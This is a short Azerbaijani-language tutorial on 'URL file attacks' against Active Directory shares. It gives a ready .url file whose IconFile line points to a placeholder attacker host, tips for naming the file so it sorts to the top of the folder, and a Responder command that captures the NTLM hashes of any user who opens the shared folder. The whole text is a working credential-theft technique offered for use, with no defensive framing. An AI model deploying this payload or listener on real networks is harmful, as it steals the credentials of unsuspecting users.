URL File Attacks

URL File Attacks nədir?

Bir url faylı istifadəcini hücum edənin sistemindən bir icon istəməyə məcbur edir.Beləliklədə hesabı hashlərini əldə edir.Bir .url faylı yaradılır və paylaşılır AD də hər hansı bir user həmin paylaşılmış qovluqa daxil olsa hüçum baş vermiş olar.

URL FİLE yaradılması

Uzantısı .url olan bir fayl yaradırıq və adınlı yazarkən ya @ yada ~ başlayın bunun səbəbi qovluqda ən üstə gəlməsidi.

faylın məzmunu

[InternetShortcut]
URL=http://google.com
WorkingDirectory=%username%
IconFile=\\<AttackerIP>\%USERNAME%.icon
IconIndex=1

[InternetShortcut] :bu faylın bir internet qısa yolu olduqunu bildirir.

URL :qısayolun işə salınmalı olduğu vebsayt URL-ni təyin edir

WorkingDirectory : Faylın yerləşəcəyi yeri göstərır

IconFile=\\<AttackerIP>\%USERNAME%.icon qısayol üçün istifadə ediləcək ikon faylının yerini müəyyən edir. icon faylı <AttackerIP> IP ünvanı ilə təyin olunan uzaq kompüterdə saxlanıla bilər. %USERNAME%cari istifadəçinin istifadəçi adı ilə əvəz edilmişdir. “.icon” uzantısı ikona məlumatlarını ehtiva edən faylın növünü təyin edir

Faylı yaradıqdan sonra paylaşılmış qohluqa qoyuruq və qovluqu birinin acmaqını gözləyirik

Responder

Öz maşınımızdan responderdən istifadə edərək dinləmə acırıq

sudo responder -I eth0 -v

əgər kimsə url faylının yerləşdıyi qovluqu acarsa onun NTLM hashini əldə etmiş oluruq.